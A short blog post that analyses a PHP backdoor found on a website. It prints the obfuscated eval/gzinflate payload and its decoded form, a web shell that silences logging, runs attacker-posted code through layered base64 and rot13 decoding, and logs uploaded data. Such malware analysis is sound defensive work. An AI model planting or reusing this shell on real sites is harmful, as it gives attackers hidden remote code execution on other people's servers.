Today, I found following backdoor warped in eval() and gzinflate() functions. It can be used to download any file from remote location to infected website. Here is its code.
eval(gzinflate(base64_decode("FZM1EqUKAgDv8qP5RYA/oDbC3Z1kC3d3Tr+zF+jqoLu80uFP/bVTNaRH+SdL9/KH/bco87ko//zDFYbArU9K15x9VZ9TIjwtvH09OTgtlNjZ38RJrC8APovpTfwIJuCa5enrgVnr4cv+2BUYwXjvwwQJlHkUPi1K0IPXOC08Ci2nC5FCZ3D7pAo99kKng9aah3sjq6/LiiY59yev5g71fhxrza/CMCy3oQ3W+MuvcTgStg34yYF8HKlFY4VuKQquiPW0YgRpUqVbC041DVYaqOYz4SzC0tZVymwby+5im9+oGmJoL1GYYzAosk3AYfS6xMwOrRHVPYFO2pIrnxX/nn4JAh+qbD4RdNg4hVFXFyttmHsAvkEmO/giu1F00ViMhgq4IOdAefAfECoDsNqk2DvHNqpCQEeUrr6GP+3GzclKWH/+TzLwnxoT8huyMI/DSpX39x0c8Q1Jk1XeoixXWBQs6P5Nnau+rfkhPUCPFBAaSRkAKU8EF8Km9ADJb8yiqD5yQ0qiQIK7+RmldyefGVjPTt2v/VS28jH1y4RqidbqiDG6/qlPLWWZV3GVGuR+KAVzN8PJbzm31109UMQfcb73gor2r/l7FjLElNAGrRFIqsJWGWQt2GqJqpYkNTfPRrj2u6m6JH6qNyTcQsTMOELEK1w7q/A17pec0ZJURYC84zIXNGwZEIDzkEOnjaY1IcE95ygTCRYRXEmxduoVLP2R5N30CHoNTfpe4bNRI2xb5auVnNXJ4tDgWTzNrYIdSXbHYlpA9tM+IfS0qhERHVWuSh4BTSTkJEnjr+kXDXj+GSnbdZ07tSi4aEflRdvEaZ0s8k/n2gsNLBrIRzKcKlANLNM946o/oU9bQEnIc5/gKSNS0RwgEU+W6HXLo096WsZZZY9ZT8JwNZL6SzBgh4xfCT90JPFocM8l50znnkhe3laj5G/wNxe4T6MCmTGvzyoUaoCZLvy84Nkop21YwhQB6qO2L9jSUa+WprOeikGoNDbB18upAaPikNDeCiDjvcFNQgISiIaxG1eJFikFVyE4tMOx8hkzPbAknsczz1hijCwV/RZIdjmc10DnxPJhGd0BQIKV396UQZ2i3Yb2YexJT1DoDn4zC9Gg/tDiI9gwB8dSZ9y80FosulfSe/L7rLAluxMpacISqio7hgUPPiXcajvbngdqg+XHYJ3XVQye0pjrl0aCI2G74D8/DghWAxRHkGdQgFZS59kUgBl+wsGupXe7pBsaqQQAVsoUhKThA4MAIZTt4rqGiSdfnQOOnegR2wuVYLyc7dXE2i2KKi1xVTInM5/deSERf7ZWSwhvtfKG8AchPaObcNf4Rh04+OptLpya76yZ6/dj8gksQ1bY872U1yGhRWKWI3bumX2xq4v4RCeyENnwJqBfTZDoCE07QbnWdYsle7AoL/7yyGBNvRQm9uzMsLIVg3wJgVyk77HZH7fCpUtvm4f2tw45BagRH7jwYvorz7ke6zLLS2lHdSKi9u0B1WlPwo3DJFNi5au5srrsyKhZhrEbaCDvu5aV45fDA0SUiSOylXiwpqeBh7owxAh27j4V3UEUxXLp2tgaFooRBrNg2bpiARKgrDbv0meQeyekQYpJVLOVFc6rgij74BlEsdZ0/s5M+dF4kc7xWu7BDtpf8XbbEQ7GjvaJxzsgu+EkMc4skn3utVAeFALHnI4vi4poQsRwrpEk20cg/xYE6dFfoij4doxyjKlfnE+uH7OR4dJqN2D9XzU7h9OB1KvtVJl+NnOuRf4W7bfaRQGug3SVXBnixQAQ5+nO4XinWv1wW9aCUzQvlb8h2WDBykD0sN7pebEHMjG3Fiaoo0kgUQkT+E9TYCShwvt6x2viplrihnmzE36enHodFL7o94c73D8l741RvjklTzgBTCoQxAGwuioQs/75999///M/")));
If we inflate this compress data, we find following PHP script:
@error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;
No comments:
Post a Comment